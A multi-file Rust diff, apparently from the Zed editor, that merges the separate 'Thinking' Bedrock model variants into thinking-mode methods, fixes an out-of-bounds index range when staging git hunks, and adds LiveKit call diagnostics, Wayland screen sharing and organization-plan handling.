Self::NovaLite | Self::NovaPro | Self::NovaPremier | Self::Nova2Lite => true,
Self::MistralLarge3 | Self::PixtralLarge | Self::MagistralSmall => true,
// Gemma accepts toolConfig without error but produces unreliable tool
@@ -492,17 +439,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => true,
+ | Self::ClaudeSonnet4_6 => true,
Self::NovaLite | Self::NovaPro => true,
Self::PixtralLarge => true,
Self::Qwen3VL235B => true,
@@ -515,15 +456,10 @@ impl Model {
matches!(
self,
Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
)
}
@@ -531,17 +467,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => true,
+ | Self::ClaudeSonnet4_6 => true,
Self::Custom {
cache_configuration,
..
@@ -553,17 +483,11 @@ impl Model {
pub fn cache_configuration(&self) -> Option<BedrockModelCacheConfiguration> {
match self {
Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => Some(BedrockModelCacheConfiguration {
+ | Self::ClaudeSonnet4_6 => Some(BedrockModelCacheConfiguration {
max_cache_anchors: 4,
min_total_token: 1024,
}),
@@ -579,25 +503,34 @@ impl Model {
}
}
- pub fn mode(&self) -> BedrockModelMode {
- match self {
- Self::ClaudeSonnet4Thinking | Self::ClaudeSonnet4_5Thinking => {
- BedrockModelMode::Thinking {
- budget_tokens: Some(4096),
- }
+ pub fn supports_thinking(&self) -> bool {
+ matches!(
+ self,
+ Self::ClaudeHaiku4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_6
+ | Self::ClaudeSonnet4_6
+ )
+ }
+
+ pub fn supports_adaptive_thinking(&self) -> bool {
+ matches!(self, Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6)
+ }
+
+ pub fn thinking_mode(&self) -> BedrockModelMode {
+ if self.supports_adaptive_thinking() {
+ BedrockModelMode::AdaptiveThinking {
+ effort: BedrockAdaptiveThinkingEffort::default(),
}
- Self::ClaudeOpus4_1Thinking | Self::ClaudeOpus4_5Thinking => {
- BedrockModelMode::Thinking {
- budget_tokens: Some(4096),
- }
+ } else if self.supports_thinking() {
+ BedrockModelMode::Thinking {
+ budget_tokens: Some(4096),
}
- Self::ClaudeOpus4_6Thinking => BedrockModelMode::AdaptiveThinking {
- effort: BedrockAdaptiveThinkingEffort::default(),
- },
- Self::ClaudeSonnet4_6Thinking => BedrockModelMode::AdaptiveThinking {
- effort: BedrockAdaptiveThinkingEffort::default(),
- },
- _ => BedrockModelMode::Default,
+ } else {
+ BedrockModelMode::Default
}
}
@@ -612,15 +545,10 @@ impl Model {
self,
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Nova2Lite
);
@@ -676,39 +604,26 @@ impl Model {
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Nova2Lite,
"global",
) => Ok(format!("{}.{}", region_group, model_id)),
// US Government region inference profiles
- (Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4_5Thinking, "us-gov") => {
- Ok(format!("{}.{}", region_group, model_id))
- }
+ (Self::ClaudeSonnet4_5, "us-gov") => Ok(format!("{}.{}", region_group, model_id)),
// US region inference profiles
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Llama4Scout17B
| Self::Llama4Maverick17B
| Self::NovaLite
@@ -728,11 +643,8 @@ impl Model {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::NovaLite
| Self::NovaPro
| Self::Nova2Lite,
@@ -743,11 +655,8 @@ impl Model {
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking,
+ | Self::ClaudeSonnet4_6,
"au",
) => Ok(format!("{}.{}", region_group, model_id)),
@@ -755,9 +664,7 @@ impl Model {
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Nova2Lite,
"jp",
) => Ok(format!("{}.{}", region_group, model_id)),
@@ -767,7 +674,6 @@ impl Model {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::NovaLite
| Self::NovaPro
| Self::Nova2Lite,
@@ -889,7 +795,7 @@ mod tests {
"us-gov.anthropic.claude-sonnet-4-5-20250929-v1:0"
);
assert_eq!(
- Model::ClaudeSonnet4_5Thinking.cross_region_inference_id("us-gov-west-1", false)?,
+ Model::ClaudeSonnet4_5.cross_region_inference_id("us-gov-west-1", false)?,
"us-gov.anthropic.claude-sonnet-4-5-20250929-v1:0"
);
Ok(())
@@ -996,33 +902,43 @@ mod tests {
"meta.llama4-scout-17b-instruct-v1:0"
);
- // Thinking models have different friendly IDs but same request IDs
+ // Thinking aliases deserialize to the same model
assert_eq!(Model::ClaudeSonnet4.id(), "claude-sonnet-4");
assert_eq!(
- Model::ClaudeSonnet4Thinking.id(),
- "claude-sonnet-4-thinking"
- );
- assert_eq!(
- Model::ClaudeSonnet4.request_id(),
- Model::ClaudeSonnet4Thinking.request_id()
+ Model::from_id("claude-sonnet-4-thinking").unwrap().id(),
+ "claude-sonnet-4"
);
}
#[test]
- fn test_model_modes() {
- assert_eq!(Model::ClaudeSonnet4.mode(), BedrockModelMode::Default);
+ fn test_thinking_modes() {
+ assert!(Model::ClaudeHaiku4_5.supports_thinking());
+ assert!(Model::ClaudeSonnet4.supports_thinking());
+ assert!(Model::ClaudeSonnet4_5.supports_thinking());
+ assert!(Model::ClaudeOpus4_6.supports_thinking());
+
+ assert!(!Model::ClaudeSonnet4.supports_adaptive_thinking());
+ assert!(Model::ClaudeOpus4_6.supports_adaptive_thinking());
+ assert!(Model::ClaudeSonnet4_6.supports_adaptive_thinking());
+
assert_eq!(
- Model::ClaudeSonnet4Thinking.mode(),
+ Model::ClaudeSonnet4.thinking_mode(),
BedrockModelMode::Thinking {
budget_tokens: Some(4096)
}
);
assert_eq!(
- Model::ClaudeOpus4_6Thinking.mode(),
+ Model::ClaudeOpus4_6.thinking_mode(),
BedrockModelMode::AdaptiveThinking {
effort: BedrockAdaptiveThinkingEffort::High
}
);
+ assert_eq!(
+ Model::ClaudeHaiku4_5.thinking_mode(),
+ BedrockModelMode::Thinking {
+ budget_tokens: Some(4096)
+ }
+ );
}
#[test]
@@ -1,14 +1,15 @@
use gpui::{
- AnyElement, App, Context, EventEmitter, Global, IntoElement, Render, Subscription, Window,
+ AnyElement, App, Context, EventEmitter, Font, Global, IntoElement, Render, Subscription, Window,
};
use ui::prelude::*;
use workspace::{
ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView,
- item::{BreadcrumbText, ItemEvent, ItemHandle},
+ item::{HighlightedText, ItemEvent, ItemHandle},
};
type RenderBreadcrumbTextFn = fn(
- Vec<BreadcrumbText>,
+ Vec<HighlightedText>,
+ Option<Font>,
Option<AnyElement>,
&dyn ItemHandle,
bool,
@@ -57,7 +58,7 @@ impl Render for Breadcrumbs {
return element.into_any_element();
};
- let Some(segments) = active_item.breadcrumbs(cx) else {
+ let Some((segments, breadcrumb_font)) = active_item.breadcrumbs(cx) else {
return element.into_any_element();
};
@@ -66,6 +67,7 @@ impl Render for Breadcrumbs {
if let Some(render_fn) = cx.try_global::<RenderBreadcrumbText>() {
(render_fn.0)(
segments,
+ breadcrumb_font,
prefix_element,
active_item.as_ref(),
false,
@@ -890,6 +890,16 @@ impl BufferDiffInner<Entity<language::Buffer>> {
.end
.saturating_sub(prev_unstaged_hunk_buffer_end);
let index_end = prev_unstaged_hunk_base_text_end + end_overshoot;
+
+ // Clamp to the index text bounds. The overshoot mapping assumes that
+ // text between unstaged hunks is identical in the buffer and index.
+ // When the buffer has been edited since the diff was computed, anchor
+ // positions shift while diff_base_byte_range values don't, which can
+ // cause index_end to exceed index_text.len().
+ // See `test_stage_all_with_stale_buffer` which would hit an assert
+ // without these min calls
+ let index_end = index_end.min(index_text.len());
+ let index_start = index_start.min(index_end);
let index_byte_range = index_start..index_end;
let replacement_text = match new_status {
@@ -2738,6 +2748,51 @@ mod tests {
});
}
+ #[gpui::test]
+ async fn test_stage_all_with_stale_buffer(cx: &mut TestAppContext) {
+ // Regression test for ZED-5R2: when the buffer is edited after the diff is
+ // computed but before staging, anchor positions shift while diff_base_byte_range
+ // values don't. If the primary (HEAD) hunk extends past the unstaged (index)
+ // hunk, an edit in the extension region shifts the primary hunk end without
+ // shifting the unstaged hunk end. The overshoot calculation then produces an
+ // index_end that exceeds index_text.len().
+ //
+ // Setup:
+ // HEAD: "aaa\nbbb\nccc\n" (primary hunk covers lines 1-2)
+ // Index: "aaa\nbbb\nCCC\n" (unstaged hunk covers line 1 only)
+ // Buffer: "aaa\nBBB\nCCC\n" (both lines differ from HEAD)
+ //
+ // The primary hunk spans buffer offsets 4..12, but the unstaged hunk only
+ // spans 4..8. The pending hunk extends 4 bytes past the unstaged hunk.
+ // An edit at offset 9 (inside "CCC") shifts the primary hunk end from 12
+ // to 13 but leaves the unstaged hunk end at 8, making index_end = 13 > 12.
+ let head_text = "aaa\nbbb\nccc\n";
+ let index_text = "aaa\nbbb\nCCC\n";
+ let buffer_text = "aaa\nBBB\nCCC\n";
+
+ let mut buffer = Buffer::new(
+ ReplicaId::LOCAL,
+ BufferId::new(1).unwrap(),
+ buffer_text.to_string(),
+ );
+
+ let unstaged_diff = cx.new(|cx| BufferDiff::new_with_base_text(index_text, &buffer, cx));
+ let uncommitted_diff = cx.new(|cx| {
+ let mut diff = BufferDiff::new_with_base_text(head_text, &buffer, cx);
+ diff.set_secondary_diff(unstaged_diff);
+ diff
+ });
+
+ // Edit the buffer in the region between the unstaged hunk end (offset 8)
+ // and the primary hunk end (offset 12). This shifts the primary hunk end
+ // but not the unstaged hunk end.
+ buffer.edit([(9..9, "Z")]);
+
+ uncommitted_diff.update(cx, |diff, cx| {
+ diff.stage_or_unstage_all_hunks(true, &buffer, true, cx);
+ });
+ }
+
#[gpui::test]
async fn test_toggling_stage_and_unstage_same_hunk(cx: &mut TestAppContext) {
let head_text = "
@@ -19,7 +19,8 @@ test-support = [
"gpui/test-support",
"livekit_client/test-support",
"project/test-support",
- "util/test-support"
+ "util/test-support",
+ "workspace/test-support"
]
[dependencies]
@@ -51,5 +52,6 @@ gpui = { workspace = true, features = ["test-support"] }
language = { workspace = true, features = ["test-support"] }
project = { workspace = true, features = ["test-support"] }
util = { workspace = true, features = ["test-support"] }
+workspace = { workspace = true, features = ["test-support"] }
livekit_client = { workspace = true, features = ["test-support"] }
@@ -0,0 +1,232 @@
+use gpui::{Context, Task, WeakEntity};
+use livekit_client::ConnectionQuality;
+use std::time::Duration;
+
+use super::room::Room;
+
+#[derive(Clone, Default)]
+pub struct CallStats {
+ pub connection_quality: Option<ConnectionQuality>,
+ pub effective_quality: Option<ConnectionQuality>,
+ pub latency_ms: Option<f64>,
+ pub jitter_ms: Option<f64>,
+ pub packet_loss_pct: Option<f64>,
+ pub input_lag: Option<Duration>,
+}
+
+pub struct CallDiagnostics {
+ stats: CallStats,
+ room: WeakEntity<Room>,
+ poll_task: Option<Task<()>>,
+ stats_update_task: Option<Task<()>>,
+}
+
+impl CallDiagnostics {
+ pub fn new(room: WeakEntity<Room>, cx: &mut Context<Self>) -> Self {
+ let mut this = Self {
+ stats: CallStats::default(),
+ room,
+ poll_task: None,
+ stats_update_task: None,
+ };
+ this.start_polling(cx);
+ this
+ }
+
+ pub fn stats(&self) -> &CallStats {
+ &self.stats
+ }
+
+ fn start_polling(&mut self, cx: &mut Context<Self>) {
+ self.poll_task = Some(cx.spawn(async move |this, cx| {
+ loop {
+ if this.update(cx, |this, cx| this.poll_stats(cx)).is_err() {
+ break;
+ }
+ cx.background_executor().timer(Duration::from_secs(1)).await;
+ }
+ }));
+ }
+
+ fn poll_stats(&mut self, cx: &mut Context<Self>) {
+ let Some(room) = self.room.upgrade() else {
+ return;
+ };
+
+ let connection_quality = room.read(cx).connection_quality();
+ self.stats.connection_quality = Some(connection_quality);
+ self.stats.input_lag = room.read(cx).input_lag();
+
+ let stats_future = room.read(cx).get_stats(cx);
+
+ let background_task = cx.background_executor().spawn(async move {
+ let session_stats = stats_future.await;
+ session_stats.map(|stats| compute_network_stats(&stats))
+ });
+
+ self.stats_update_task = Some(cx.spawn(async move |this, cx| {
+ let result = background_task.await;
+ this.update(cx, |this, cx| {
+ if let Some(computed) = result {
+ this.stats.latency_ms = computed.latency_ms;
+ this.stats.jitter_ms = computed.jitter_ms;
+ this.stats.packet_loss_pct = computed.packet_loss_pct;
+ }
+ let quality = this
+ .stats
+ .connection_quality
+ .unwrap_or(ConnectionQuality::Lost);
+ this.stats.effective_quality =
+ Some(effective_connection_quality(quality, &this.stats));
+ cx.notify();
+ })
+ .ok();
+ }));
+ }
+}
+
+struct ComputedNetworkStats {
+ latency_ms: Option<f64>,
+ jitter_ms: Option<f64>,
+ packet_loss_pct: Option<f64>,
+}
+
+fn compute_network_stats(stats: &livekit_client::SessionStats) -> ComputedNetworkStats {
+ let mut min_rtt: Option<f64> = None;
+ let mut max_jitter: Option<f64> = None;
+ let mut total_packets_received: u64 = 0;
+ let mut total_packets_lost: i64 = 0;
+
+ let all_stats = stats
+ .publisher_stats
+ .iter()
+ .chain(stats.subscriber_stats.iter());
+
+ for stat in all_stats {
+ extract_metrics(
+ stat,
+ &mut min_rtt,
+ &mut max_jitter,
+ &mut total_packets_received,
+ &mut total_packets_lost,
+ );
+ }
+
+ let total_expected = total_packets_received as i64 + total_packets_lost;
+ let packet_loss_pct = if total_expected > 0 {
+ Some((total_packets_lost as f64 / total_expected as f64) * 100.0)
+ } else {
+ None
+ };
+
+ ComputedNetworkStats {
+ latency_ms: min_rtt.map(|rtt| rtt * 1000.0),
+ jitter_ms: max_jitter.map(|j| j * 1000.0),
+ packet_loss_pct,
+ }
+}
+
+#[cfg(all(
+ not(rust_analyzer),
+ any(
+ test,
+ feature = "test-support",
+ all(target_os = "windows", target_env = "gnu"),
+ target_os = "freebsd"
+ )
+))]
+fn extract_metrics(
+ _stat: &livekit_client::RtcStats,
+ _min_rtt: &mut Option<f64>,
+ _max_jitter: &mut Option<f64>,
+ _total_packets_received: &mut u64,
+ _total_packets_lost: &mut i64,
+) {
+}
+
+#[cfg(any(
+ rust_analyzer,
+ not(any(
+ test,
+ feature = "test-support",
+ all(target_os = "windows", target_env = "gnu"),
+ target_os = "freebsd"
+ ))
+))]
+fn extract_metrics(
+ stat: &livekit_client::RtcStats,
+ min_rtt: &mut Option<f64>,
+ max_jitter: &mut Option<f64>,
+ total_packets_received: &mut u64,
+ total_packets_lost: &mut i64,
+) {
+ use livekit_client::RtcStats;
+
+ match stat {
+ RtcStats::CandidatePair(pair) => {
+ let rtt = pair.candidate_pair.current_round_trip_time;
+ if rtt > 0.0 {
+ *min_rtt = Some(match *min_rtt {
+ Some(current) => current.min(rtt),
+ None => rtt,
+ });
+ }
+ }
+ RtcStats::InboundRtp(inbound) => {
+ let jitter = inbound.received.jitter;
+ if jitter > 0.0 {
+ *max_jitter = Some(match *max_jitter {
+ Some(current) => current.max(jitter),
+ None => jitter,
+ });
+ }
+ *total_packets_received += inbound.received.packets_received;
+ *total_packets_lost += inbound.received.packets_lost;
+ }
+ RtcStats::RemoteInboundRtp(remote_inbound) => {
+ let rtt = remote_inbound.remote_inbound.round_trip_time;
+ if rtt > 0.0 {
+ *min_rtt = Some(match *min_rtt {
+ Some(current) => current.min(rtt),
+ None => rtt,
+ });
+ }
+ }
+ _ => {}
+ }
+}
+
+fn metric_quality(value: f64, warn_threshold: f64, error_threshold: f64) -> ConnectionQuality {
+ if value < warn_threshold {
+ ConnectionQuality::Excellent
+ } else if value < error_threshold {
+ ConnectionQuality::Poor
+ } else {
+ ConnectionQuality::Lost
+ }
+}
+
+/// Computes the effective connection quality by taking the worst of the
+/// LiveKit-reported quality and each individual metric rating.
+fn effective_connection_quality(
+ livekit_quality: ConnectionQuality,
+ stats: &CallStats,
+) -> ConnectionQuality {
+ let mut worst = livekit_quality;
+
+ if let Some(latency) = stats.latency_ms {
+ worst = worst.max(metric_quality(latency, 100.0, 300.0));
+ }
+ if let Some(jitter) = stats.jitter_ms {
+ worst = worst.max(metric_quality(jitter, 30.0, 75.0));
+ }
+ if let Some(loss) = stats.packet_loss_pct {
+ worst = worst.max(metric_quality(loss, 1.0, 5.0));
+ }
+ if let Some(lag) = stats.input_lag {
+ let lag_ms = lag.as_secs_f64() * 1000.0;
+ worst = worst.max(metric_quality(lag_ms, 20.0, 50.0));
+ }
+
+ worst
+}
@@ -1,3 +1,4 @@
+pub mod diagnostics;
pub mod participant;
pub mod room;
@@ -23,7 +23,10 @@ use livekit_client::{self as livekit, AudioStream, TrackSid};
use postage::{sink::Sink, stream::Stream, watch};
use project::Project;
use settings::Settings as _;
+use std::sync::atomic::AtomicU64;
use std::{future::Future, mem, rc::Rc, sync::Arc, time::Duration, time::Instant};
+
+use super::diagnostics::CallDiagnostics;
use util::{ResultExt, TryFutureExt, paths::PathStyle, post_inc};
use workspace::ParticipantLocation;
@@ -69,6 +72,7 @@ pub struct Room {
id: u64,
channel_id: Option<ChannelId>,
live_kit: Option<LiveKitRoom>,
+ diagnostics: Option<Entity<CallDiagnostics>>,
status: RoomStatus,
shared_projects: HashSet<WeakEntity<Project>>,
joined_projects: HashSet<WeakEntity<Project>>,
@@ -136,6 +140,7 @@ impl Room {
id,
channel_id,
live_kit: None,
+ diagnostics: None,
status: RoomStatus::Online,
shared_projects: Default::default(),
joined_projects: Default::default(),
@@ -350,6 +355,7 @@ impl Room {
self.participant_user_ids.clear();
self.client_subscriptions.clear();
self.live_kit.take();
+ self.diagnostics.take();
self.pending_room_update.take();
self.maintain_connection.take();
}
@@ -540,6 +546,42 @@ impl Room {
}
}
+ pub fn get_stats(&self, cx: &App) -> Task<Option<livekit::SessionStats>> {
+ match self.live_kit.as_ref() {
+ Some(lk) => {
+ let task = lk.room.stats_task(cx);
+ cx.background_executor()
+ .spawn(async move { task.await.ok() })
+ }
+ None => Task::ready(None),
+ }
+ }
+
+ pub fn input_lag(&self) -> Option<Duration> {
+ let us = self
+ .live_kit
+ .as_ref()?
+ .input_lag_us
+ .as_ref()?
+ .load(std::sync::atomic::Ordering::Relaxed);
+ if us > 0 {
+ Some(Duration::from_micros(us))
+ } else {
+ None
+ }
+ }
+
+ pub fn diagnostics(&self) -> Option<&Entity<CallDiagnostics>> {
+ self.diagnostics.as_ref()
+ }
+
+ pub fn connection_quality(&self) -> livekit::ConnectionQuality {
+ self.live_kit
+ .as_ref()
+ .map(|lk| lk.room.local_participant().connection_quality())
+ .unwrap_or(livekit::ConnectionQuality::Lost)
+ }
+
pub fn status(&self) -> RoomStatus {
self.status
}
@@ -1383,7 +1425,7 @@ impl Room {
};
match publication {
- Ok((publication, stream)) => {
+ Ok((publication, stream, input_lag_us)) => {
if canceled {
cx.spawn(async move |_, cx| {
room.unpublish_local_track(publication.sid(), cx).await
@@ -1393,6 +1435,7 @@ impl Room {
if live_kit.muted_by_user || live_kit.deafened {
publication.mute(cx);
}
+ live_kit.input_lag_us = Some(input_lag_us);
live_kit.microphone_track = LocalTrack::Published {
track_publication: publication,
_stream: Box::new(stream),
@@ -1486,6 +1529,84 @@ impl Room {
})
}
+ #[cfg(target_os = "linux")]
+ pub fn share_screen_wayland(&mut self, cx: &mut Context<Self>) -> Task<Result<()>> {
+ log::info!("will screenshare on wayland");
+ if self.status.is_offline() {
+ return Task::ready(Err(anyhow!("room is offline")));
+ }
+ if self.is_sharing_screen() {
+ return Task::ready(Err(anyhow!("screen was already shared")));
+ }
+
+ let (participant, publish_id) = if let Some(live_kit) = self.live_kit.as_mut() {
+ let publish_id = post_inc(&mut live_kit.next_publish_id);
+ live_kit.screen_track = LocalTrack::Pending { publish_id };
+ cx.notify();
+ (live_kit.room.local_participant(), publish_id)
+ } else {
+ return Task::ready(Err(anyhow!("live-kit was not initialized")));
+ };
+
+ cx.spawn(async move |this, cx| {
+ let publication = participant.publish_screenshare_track_wayland(cx).await;
+
+ this.update(cx, |this, cx| {
+ let live_kit = this
+ .live_kit
+ .as_mut()
+ .context("live-kit was not initialized")?;
+
+ let canceled = if let LocalTrack::Pending {
+ publish_id: cur_publish_id,
+ } = &live_kit.screen_track
+ {
+ *cur_publish_id != publish_id
+ } else {
+ true
+ };
+
+ match publication {
+ Ok((publication, stream, failure_rx)) => {
+ if canceled {
+ cx.spawn(async move |_, cx| {
+ participant.unpublish_track(publication.sid(), cx).await
+ })
+ .detach()
+ } else {
+ cx.spawn(async move |this, cx| {
+ if failure_rx.await.is_ok() {
+ log::warn!("Wayland capture died, auto-unsharing screen");
+ let _ =
+ this.update(cx, |this, cx| this.unshare_screen(false, cx));
+ }
+ })
+ .detach();
+
+ live_kit.screen_track = LocalTrack::Published {
+ track_publication: publication,
+ _stream: stream,
+ };
+ cx.notify();
+ }
+
+ Audio::play_sound(Sound::StartScreenshare, cx);
+ Ok(())
+ }
+ Err(error) => {
+ if canceled {
+ Ok(())
+ } else {
+ live_kit.screen_track = LocalTrack::None;
+ cx.notify();
+ Err(error)
+ }
+ }
+ }
+ })?
+ })
+ }
+
pub fn toggle_mute(&mut self, cx: &mut Context<Self>) {
if let Some(live_kit) = self.live_kit.as_mut() {
// When unmuting, undeafen if the user was deafened before.
@@ -1623,6 +1744,7 @@ fn spawn_room_connection(
livekit::Room::connect(connection_info.server_url, connection_info.token, cx)
.await?;
+ let weak_room = this.clone();
this.update(cx, |this, cx| {
let _handle_updates = cx.spawn(async move |this, cx| {
while let Some(event) = events.next().await {
@@ -1642,12 +1764,14 @@ fn spawn_room_connection(
room: Rc::new(room),
screen_track: LocalTrack::None,
microphone_track: LocalTrack::None,
+ input_lag_us: None,
next_publish_id: 0,
muted_by_user,
deafened: false,
speaking: false,
_handle_updates,
});
+ this.diagnostics = Some(cx.new(|cx| CallDiagnostics::new(weak_room, cx)));
if !muted_by_user && this.can_use_microphone() {
this.share_microphone(cx)
@@ -1665,6 +1789,9 @@ struct LiveKitRoom {
room: Rc<livekit::Room>,
screen_track: LocalTrack<dyn ScreenCaptureStream>,
microphone_track: LocalTrack<AudioStream>,
+ /// Shared atomic storing the most recent input lag measurement in microseconds.
+ /// Written by the audio capture/transmit pipeline, read here for diagnostics.
+ input_lag_us: Option<Arc<AtomicU64>>,
/// Tracks whether we're currently in a muted state due to auto-mute from deafening or manual mute performed by user.
muted_by_user: bool,
deafened: bool,
@@ -1681,6 +1808,7 @@ impl LiveKitRoom {
} = mem::replace(&mut self.microphone_track, LocalTrack::None)
{
tracks_to_unpublish.push(track_publication.sid());
+ self.input_lag_us = None;
cx.notify();
}
@@ -221,7 +221,7 @@ impl ChannelBuffer {
})
.log_err();
}
- language::BufferEvent::Edited => {
+ language::BufferEvent::Edited { .. } => {
cx.emit(ChannelBufferEvent::BufferEdited);
}
_ => {}
@@ -156,6 +156,10 @@ impl ChannelStore {
cx.global::<GlobalChannelStore>().0.clone()
}
+ pub fn try_global(cx: &App) -> Option<Entity<Self>> {
+ cx.try_global::<GlobalChannelStore>().map(|g| g.0.clone())
+ }
+
pub fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
let rpc_subscriptions = [
client.add_message_handler(cx.weak_entity(), Self::handle_update_channels),
@@ -1388,7 +1388,11 @@ impl Client {
// Start an HTTP server to receive the redirect from Zed's sign-in page.
let server = tiny_http::Server::http("127.0.0.1:0")
.map_err(|e| anyhow!(e).context("failed to bind callback port"))?;
- let port = server.server_addr().port();
+ let port = server
+ .server_addr()
+ .to_ip()
+ .context("server not bound to a TCP address")?
+ .port();
// Open the Zed sign-in page in the user's browser, with query parameters that indicate
// that the user is signing in from a Zed app running on the same device.
@@ -129,7 +129,7 @@ pub fn os_version() -> String {
{
use objc2_foundation::NSProcessInfo;
let process_info = NSProcessInfo::processInfo();
- let version_nsstring = unsafe { process_info.operatingSystemVersionString() };
+ let version_nsstring = process_info.operatingSystemVersionString();
// "Version 15.6.1 (Build 24G90)" -> "15.6.1 (Build 24G90)"
let version_string = version_nsstring.to_string().replace("Version ", "");
// "15.6.1 (Build 24G90)" -> "15.6.1"
@@ -1,4 +1,6 @@
-use crate::{Client, Connection, Credentials, EstablishConnectionError, UserStore};
+use std::collections::BTreeMap;
+use std::sync::Arc;
+
use anyhow::{Context as _, Result, anyhow};
use cloud_api_client::{
AuthenticatedUser, GetAuthenticatedUserResponse, KnownOrUnknown, Plan, PlanInfo,
@@ -9,7 +11,8 @@ use gpui::{AppContext as _, Entity, TestAppContext};
use http_client::{AsyncBody, Method, Request, http};
use parking_lot::Mutex;
use rpc::{ConnectionId, Peer, Receipt, TypedEnvelope, proto};
-use std::sync::Arc;
+
+use crate::{Client, Connection, Credentials, EstablishConnectionError, UserStore};
pub struct FakeServer {
peer: Arc<Peer>,
@@ -266,6 +269,8 @@ pub fn make_get_authenticated_user_response(
},
feature_flags: vec![],
organizations: vec![],
+ default_organization_id: None,
+ plans_by_organization: BTreeMap::new(),
plan: PlanInfo {
plan: KnownOrUnknown::Known(Plan::ZedPro),
subscription_period: None,
@@ -3,7 +3,7 @@ use anyhow::{Context as _, Result};
use chrono::{DateTime, Utc};
use cloud_api_client::websocket_protocol::MessageToClient;
use cloud_api_client::{
- GetAuthenticatedUserResponse, Organization, OrganizationId, Plan, PlanInfo,
+ GetAuthenticatedUserResponse, KnownOrUnknown, Organization, OrganizationId, Plan, PlanInfo,
};
use cloud_llm_client::{
EDIT_PREDICTIONS_USAGE_AMOUNT_HEADER_NAME, EDIT_PREDICTIONS_USAGE_LIMIT_HEADER_NAME, UsageLimit,
@@ -816,7 +816,30 @@ impl UserStore {
}
self.organizations = response.organizations.into_iter().map(Arc::new).collect();
- self.current_organization = self.organizations.first().cloned();
+ self.current_organization = response
+ .default_organization_id
+ .and_then(|default_organization_id| {
+ self.organizations
+ .iter()
+ .find(|organization| organization.id == default_organization_id)
+ .cloned()
+ })
+ .or_else(|| self.organizations.first().cloned());
+ self.plans_by_organization = response
+ .plans_by_organization
+ .into_iter()
+ .map(|(organization_id, plan)| {
+ let plan = match plan {
+ KnownOrUnknown::Known(plan) => plan,
+ KnownOrUnknown::Unknown(_) => {
+ // If we get a plan that we don't recognize, fall back to the Free plan.
+ Plan::ZedFree
+ }
+ };
+
+ (organization_id, plan)
+ })
+ .collect();
self.edit_prediction_usage = Some(EditPredictionUsage(RequestUsage {
limit: response.plan.usage.edit_predictions.limit,
